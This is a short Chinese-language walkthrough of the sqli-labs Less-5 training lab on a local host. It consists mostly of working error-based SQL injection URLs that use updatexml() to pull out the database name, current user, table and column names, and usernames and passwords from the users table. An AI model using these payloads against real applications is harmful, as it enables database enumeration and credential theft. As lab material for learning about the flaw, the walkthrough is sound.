1. 确定注入点闭合方式
确认为字符型注入
2. 爆出当前数据库的库名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select database())),'~') --+
3. 爆出当前用户名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select user())),'~') --+
4. 爆出MySQL 版本
5. 查询当前数据库的表名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1)),'~') --+
注意:报错注入不能使用group_concat()函数直接将所有信息获取出来,只能一条一条获取,而且必须使用limit 0,1控制
通过limit 即可遍历出所有的表名 (emails,referers,uagents,users)
6. 查询users表的列名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),'~') --+
通过limit 即可遍历出所有的列名 (id,username,password)
7. 爆出用户信息
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select concat(username,password) from users limit 0,1)),'~') --+
可在concat中添加分隔符 更方便数据的获取
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml('~',concat('~',(select concat(username,'~',password) from users limit 0,1)),'~') --+